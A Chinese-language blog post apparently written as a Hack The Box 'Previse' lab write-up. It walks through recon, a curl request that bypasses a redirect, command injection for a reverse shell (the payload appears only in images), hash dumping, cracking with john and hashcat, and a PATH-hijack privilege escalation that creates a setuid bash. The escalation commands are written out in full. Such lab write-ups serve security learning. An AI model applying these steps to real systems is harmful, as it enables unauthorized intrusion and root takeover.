<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"sugarcrashx.github.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="wphttps:&#x2F;&#x2F;davidguest.uk&#x2F;hack-the-box-previse&#x2F;https:&#x2F;&#x2F;hackhouse.net&#x2F;htb-previse&#x2F;">
<meta property="og:type" content="article">
<meta property="og:title" content="Previse">
<meta property="og:url" content="https://sugarcrashx.github.io/2022/06/02/Previse/index.html">
<meta property="og:site_name" content="SugarCrash!">
<meta property="og:description" content="wphttps:&#x2F;&#x2F;davidguest.uk&#x2F;hack-the-box-previse&#x2F;https:&#x2F;&#x2F;hackhouse.net&#x2F;htb-previse&#x2F;">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://s2.loli.net/2022/05/31/HRFMG3TunsU5ZVX.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/31/GaxTrA4mbv6VwlR.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/31/v3H6oOBgjMpwcfQ.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/31/I3URsaNdc84r91h.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/31/9CJBjI1KvfoaRyp.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/31/59FAZoS2W4g3QPn.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/31/DP9E2FNYdyCoVJ4.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/31/xzjAo6Ggcb38OLS.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/31/JM3OfbrzPksylY2.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/31/BLQdq4E62yspbO3.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/31/Bi9AJrQfbGsCmTM.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/31/Bi9AJrQfbGsCmTM.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/31/ueAJ3zCadfnGR4y.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/31/gEWZjpNGIyXlftY.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/31/2f6g3OhNMwkqTKE.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/31/CJwz3gGEi5PVR9h.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/31/WtQX9IfRUcZ2kbP.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/31/RNtuAaTUeBgHOd5.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/31/EfNQORtAaX1s8ne.png">
<meta property="article:published_time" content="2022-06-02T03:24:16.000Z">
<meta property="article:modified_time" content="2022-06-02T03:24:45.131Z">
<meta property="article:author" content="Lu1i丶">
<meta property="article:tag" content="Hack The Box">
<meta property="article:tag" content="靶场练习">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://s2.loli.net/2022/05/31/HRFMG3TunsU5ZVX.png">

<link rel="canonical" href="https://sugarcrashx.github.io/2022/06/02/Previse/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>Previse | SugarCrash!</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">SugarCrash!</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">记录学习，想找个师傅带带我</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://sugarcrashx.github.io/2022/06/02/Previse/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/1.PNG">
      <meta itemprop="name" content="Lu1i丶">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="SugarCrash!">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Previse
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2022-06-02 11:24:16 / 修改时间：11:24:45" itemprop="dateCreated datePublished" datetime="2022-06-02T11:24:16+08:00">2022-06-02</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Hack-The-Box/" itemprop="url" rel="index"><span itemprop="name">Hack The Box</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="far fa-comment"></i>
      </span>
      <span class="post-meta-item-text">Valine：</span>
    
    <a title="valine" href="/2022/06/02/Previse/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2022/06/02/Previse/" itemprop="commentCount"></span>
    </a>
  </span>
  
  

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>wp<br><a target="_blank" rel="noopener" href="https://davidguest.uk/hack-the-box-previse/">https://davidguest.uk/hack-the-box-previse/</a><br><a target="_blank" rel="noopener" href="https://hackhouse.net/htb-previse/">https://hackhouse.net/htb-previse/</a></p>
<span id="more"></span>
<h4 id="收集"><a href="#收集" class="headerlink" title="收集"></a>收集</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">老惯例，nmap </span><br><span class="line">nmap -v -sSV -p 22,80 -Pn 10.10.11.104 -T4 -oA nmap/sSV </span><br><span class="line">感觉免费的简单靶场都是22 和 80</span><br></pre></td></tr></table></figure>
<p><img src="https://s2.loli.net/2022/05/31/HRFMG3TunsU5ZVX.png"><br>页面打开是这么个玩意儿<br><img src="https://s2.loli.net/2022/05/31/GaxTrA4mbv6VwlR.png"><br>目录扫描没扫出什么东西</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">使用 curl 时，可以从 webapp 获取真正的响应页面，因为 curl 默认不遵循重定向。 </span><br><span class="line">curl使用参考，使用的好直接取代postman工具 http://www.ruanyifeng.com/blog/2019/09/curl-reference.html </span><br><span class="line">curl -is -X GET 10.10.11.104/index.php </span><br><span class="line"></span><br><span class="line">-i 参数打印出服务器回应的 HTTP 标头。 </span><br><span class="line">-s 参数将不输出错误和进度信息。 </span><br><span class="line">-X 指定使用 GET 模式访问</span><br></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2022/05/31/v3H6oOBgjMpwcfQ.png"></p>
<p><code>访问一下10.10.11.104/accounts.php curl -is -X http://10.10.11.104/account.php</code><br>发现了3个表单，提交数据 并且说了用户名和密码在5-32个字符之间</p>
<p>-d POST 发送有参数的 POST 请求</p>
<p>用curl提交post请求访问一下 curl -is -X POST -d “username&#x3D;hacker&amp;password&#x3D;hacker&amp;confirm&#x3D;hacker” 10.10.11.104&#x2F;accounts.php 成功登陆。</p>
<p>到这感觉怪怪的<br><img src="https://s2.loli.net/2022/05/31/I3URsaNdc84r91h.png"><br>开始翻网站，翻到一个像是被注入过的一个日志文件<br><img src="https://s2.loli.net/2022/05/31/9CJBjI1KvfoaRyp.png"></p>
<p>file目录下有一个上传和一个上传文件的下载<br>backup，备份，网站备份文件，打开，干他<br>看备份文件就看config，db，这类的<br><img src="https://s2.loli.net/2022/05/31/59FAZoS2W4g3QPn.png"><br>解压文件<br>unzip siteBackup.zip<br><img src="https://s2.loli.net/2022/05/31/DP9E2FNYdyCoVJ4.png"><br>像是网站备份文件<br>config.php 是一个数据库配置文件，可以尝试连一下ssh<br><img src="https://s2.loli.net/2022/05/31/xzjAo6Ggcb38OLS.png"><br>无果</p>
<p>没啥用，继续翻文件logs.php(当然是看wp的) 看到一个exec命令执行的函数</p>
<p><img src="https://s2.loli.net/2022/05/31/JM3OfbrzPksylY2.png"><br>&amp;&amp; 连接一个反弹shell的命令<br><img src="https://s2.loli.net/2022/05/31/BLQdq4E62yspbO3.png"><br><img src="https://s2.loli.net/2022/05/31/Bi9AJrQfbGsCmTM.png"><br><img src="https://s2.loli.net/2022/05/31/Bi9AJrQfbGsCmTM.png"></p>
<p>连接成功，是个低权限的 ls 没有要找到的user root flag<br>但是&#x2F;home&#x2F;下有一个用户m4lwhere，下面有一个user.txt，需要m4lwhere权限才能访问<br>前面拿到数据库配置的文件，看能不能再数据库里面找到m4lwhere的hash 用hashcat 爆一下<br>写一个脚本导出里面的hash值</p>
<p><img src="https://s2.loli.net/2022/05/31/ueAJ3zCadfnGR4y.png"><br>echo ‘&lt;上面的代码&gt;’ &gt;&gt; status.php里<br>curl 10.10.11.104&#x2F;status.php 访问那个文件，成功读到了他的hash<br><img src="https://s2.loli.net/2022/05/31/gEWZjpNGIyXlftY.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">john </span><br><span class="line">john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt-long</span><br></pre></td></tr></table></figure>
<p><img src="https://s2.loli.net/2022/05/31/2f6g3OhNMwkqTKE.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">hashcat </span><br><span class="line">hashcat hash.txt /usr/share/wordlists/rockyou.txt -m 500</span><br></pre></td></tr></table></figure>
<p><img src="https://s2.loli.net/2022/05/31/CJwz3gGEi5PVR9h.png"><br>ssh连接拿到第一个user.txt<br><img src="https://s2.loli.net/2022/05/31/WtQX9IfRUcZ2kbP.png"></p>
<h4 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h4><p>sudo -l 看到一个access_backup.sh的root文件<br><img src="https://s2.loli.net/2022/05/31/RNtuAaTUeBgHOd5.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">cd /tmp</span><br><span class="line">cat &lt;&lt; EOF &gt; gzip </span><br><span class="line">&gt; #!/bin/bash </span><br><span class="line">&gt; cp /bin/bash /tmp/c </span><br><span class="line">&gt; chmod u+s /tmp/c </span><br><span class="line">&gt; EOF </span><br><span class="line">chmod +x gzip export PATH=$( pwd ):$PATH </span><br><span class="line"></span><br><span class="line">sudo /opt/scripts/access_backup.sh </span><br><span class="line">./c -p</span><br></pre></td></tr></table></figure>

<h4 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h4><p>进web有点蒙，提权有点蒙<br><img src="https://s2.loli.net/2022/05/31/EfNQORtAaX1s8ne.png"></p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/Hack-The-Box/" rel="tag"># Hack The Box</a>
              <a href="/tags/%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/" rel="tag"># 靶场练习</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/06/02/Seal/" rel="prev" title="Seal">
      <i class="fa fa-chevron-left"></i> Seal
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/06/02/BountyHunter/" rel="next" title="BountyHunter">
      BountyHunter <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="valine-comments"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%94%B6%E9%9B%86"><span class="nav-number">1.</span> <span class="nav-text">收集</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%8F%90%E6%9D%83"><span class="nav-number">2.</span> <span class="nav-text">提权</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%80%BB%E7%BB%93"><span class="nav-number">3.</span> <span class="nav-text">总结</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Lu1i丶"
      src="/images/1.PNG">
  <p class="site-author-name" itemprop="name">Lu1i丶</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">35</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">7</span>
        <span class="site-state-item-name">分类</span>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">17</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title"><i class="fa fa-link fa-fw"></i>
      Links
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://txluck.github.io/" title="https:&#x2F;&#x2F;txluck.github.io&#x2F;" rel="noopener" target="_blank">永安寺</a>
        </li>
    </ul>
  </div>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Lu1i丶</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  


<script>
NexT.utils.loadComments(document.querySelector('#valine-comments'), () => {
  NexT.utils.getScript('//unpkg.com/valine/dist/Valine.min.js', () => {
    var GUEST = ['nick', 'mail', 'link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item => {
      return GUEST.includes(item);
    });
    new Valine({
      el         : '#valine-comments',
      verify     : false,
      notify     : false,
      appId      : '2IjWrTCGWIUFwAsamIh2ezIu-gzGzoHsz',
      appKey     : 'EOJr4RJE5lM0E3ryx1vGuAPV',
      placeholder: "Just go go",
      avatar     : 'mm',
      meta       : guest,
      pageSize   : '10' || 10,
      visitor    : false,
      lang       : 'zh-cn' || 'zh-cn',
      path       : location.pathname,
      recordIP   : true,
      serverURLs : ''
    });
  }, window.Valine);
});
</script>

</body>
</html>
